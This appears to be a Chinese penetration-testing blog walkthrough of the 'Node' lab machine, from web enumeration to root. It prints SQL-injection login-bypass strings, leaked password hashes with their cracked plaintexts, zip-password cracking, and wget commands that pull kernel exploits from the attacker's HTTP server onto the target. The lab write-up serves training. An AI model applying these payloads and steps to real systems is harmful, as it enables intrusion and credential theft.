提权靶机Node

01639

主机探测 && 80端口探测

image-20250108184628750

端口扫描,只开启了3000和22端口,看样子就是要让我们从3000这个端口找22登录的信息

image-20250108184757573

访问3000端口的网页

image-20250108184850384

向我们新成员问好,一共有三个用户tom,mark,rastating

切换到登录界面,sql侏儒万能密码 / 弱口令

tom' or 1=1 --+
tom' or 1=1 -- +
tom' or 1=1 #
tom" or 1=1 #
tom" || 1=1 #
tom' || 1=1 --+

image-20250108185349850

这里意思就是说,MyPlace这个项目的介绍,告诉我们,注册的入口已经关闭了,我们可以查看用户的资料

image-20250108185703228

查看用户资料,三个人都是一个信息

User xxx are still not completed, check back later to learn more about mark!

image-20250108185840455

image-20250108190945698

用户界面的sql注入

image-20250108191400986

cookie伪造,利用cookie伪造,可以绕过前端验证的cookie

image-20250108191547327

找到app.js,暴露了所有的路由信息,但是没啥用基本都访问过了

image-20250108192412173

我们看看接口信息有一个/api/users

image-20250108193103238

访问,信息泄露了

image-20250108193038335

[
    {"_id":"59a7365b98aa325cc03ee51c","username":"myP14ceAdm1nAcc0uNT","password":"dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af","is_admin":true},
    {"_id":"59a7368398aa325cc03ee51d","username":"tom","password":"f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240","is_admin":false},
    {"_id":"59a7368e98aa325cc03ee51e","username":"mark","password":"de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73","is_admin":false},
    {"_id":"59aa9781cced6f1d1490fce9","username":"rastating","password":"5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0","is_admin":false}
]

识别一下吧,hash-identifier是一个hash值的识别工具

image-20250108193348667

https://www.cmd5.com/ 丢进去一个一个解密,只有第四个用户没有解出来

image-20250108234534398

myP14ceAdm1nAcc0uNT :manchester

tom :spongebob

mark :snowflake

有了账号密码,还可以测试ssh连接,刚开始端口扫描的时候是有一个22端口ssh的

管理员 myP14ceAdm1nAcc0uNT 成功页面

image-20250108234625648

不清楚这是什么文件嘞

image-20250108234741976

换一个用户 tom

image-20250108234958253

那么只能从管理员用户的那个backup文件下手了

image-20250110222813776

查看文件内容,疑似base64

image-20250110223251067

重定向到一个zip文件,解压的时候,提示我们输入密码,看样子这就是一个备份的zip文件

image-20250110223404110

利用fcrackzip使用kali自带的字典破解zip压缩包

image-20250110224709765

切换到目录下,看样子应该是网站的源码了

image-20250110224936919

版本信息,包含了express.js版本和mongodb版本

image-20250110225011291

查看app.js泄露了数据库的密码

image-20250110225507731

盲猜ssh密码和数据库密码一模一样,登录成功

image-20250110225608806

内核信息收集

image-20250110232259729

漏洞检索,发现几个可能的内核提权漏洞

image-20250110232429726

复制到当前目录 searchsploit -m 编号

image-20250110232511951

开启http服务

image-20250110232846322

下载命令检查

image-20250110232823355

wget 192.168.111.128:8000/44300.c
wget 192.168.111.128:8000/44298.c
wget 192.168.111.128:8000/40049.c
wget 192.168.111.128:8000/40871.c

将四个文件传到靶机上进行编译,一个一个尝试,编译失败也不要紧,就换一个exp,最后得到44298.c这个exp能提权成功

image-20250110233135031

本靶机主要是前端express.js编写的前端项目,项目打包的源码暴露了api接口的信息,通过访问此api接口,由于后端的过滤不严谨,造成的信息泄露,进而获取了目标的权限

往期推荐

【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏

ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略

【内网渗透】免工具,内网、域内信息收集的40种方式总结

【渗透测试】ATT&CK靶场一,phpmyadmin,域渗透,内网横向移动攻略

【渗透测试】linux隐身登录

本站内容部分转载于互联网,并不代表本站立场!如若本站内容侵犯了原著者的合法权益,可联系我们进行处理! 拒绝任何人以任何形式在本站发表与中华人民共和国法律相抵触的言论!
THE END
OSCP打靶泷羽收录
喜欢就支持一下吧
点赞9 分享
小北的头像-泷羽Sec
windows渗透操作系统-泷羽Sec
windows渗透操作系统
windows渗透操作系统
4天前 427
2024 最新 Kali Linux 定制化魔改,完整版添加常见60渗透工具-泷羽Sec
2024 最新 Kali Linux 定制化魔改,完整版添加常见60渗透工具
2024 最新 Kali Linux 定制化魔改,完整版添加常见60渗透工具
4天前 412
比kali更稳定,工具更多,更加适合开发的操作系统blackarch-泷羽Sec
比kali更稳定,工具更多,更加适合开发的操作系统blackarch
比kali更稳定,工具更多,更加适合开发的操作系统blackarch
4天前 410
【渗透工具箱】灵兔宝盒-Rabbit_Treasure_Box_V1.0.1-泷羽Sec
【渗透工具箱】灵兔宝盒-Rabbit_Treasure_Box_V1.0.1
【渗透工具箱】灵兔宝盒-Rabbit_Treasure_Box_V1.0.1
4天前 408
某cms的渗透测试过程-泷羽Sec
某cms的渗透测试过程
某cms的渗透测试过程
4天前 396
XSS高级用法,SEO,挂ma,MS14_064利用-泷羽Sec
XSS高级用法,SEO,挂ma,MS14_064利用
XSS高级用法,SEO,挂ma,MS14_064利用
4天前 395
相关推荐
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称

请填写用户信息:

  • 昵称(必填)
  • 邮箱(必填)
表情
[aoman][baiyan][bishi][bizui][cahan][ciya][dabing][daku][deyi][doge][fadai][fanu][fendou][ganga][guzhang][haixiu][hanxiao][zuohengheng][zhuakuang][zhouma][zhemo][zhayanjian][zaijian][yun][youhengheng][yiwen][yinxian][xu][xieyanxiao][xiaoku][xiaojiujie][xia][wunai][wozuimei][weixiao][weiqu][tuosai][tu][touxiao][tiaopi][shui][se][saorao][qiudale][qinqin][qiaoda][piezui][penxue][nanguo][liulei][liuhan][lenghan][leiben][kun][kuaikule][ku][koubi][kelian][keai][jingya][jingxi][jingkong][jie][huaixiao][haqian][aini][OK][qiang][quantou][shengli][woshou][gouyin][baoquan][aixin][bangbangtang][xiaoyanger][xigua][hexie][pijiu][lanqiu][juhua][hecai][haobang][caidao][baojin][chi][dan][kulou][shuai][shouqiang][yangtuo][youling]
代码

请输入代码:

确认
图片

    暂无评论内容

OSCP介绍-泷羽Sec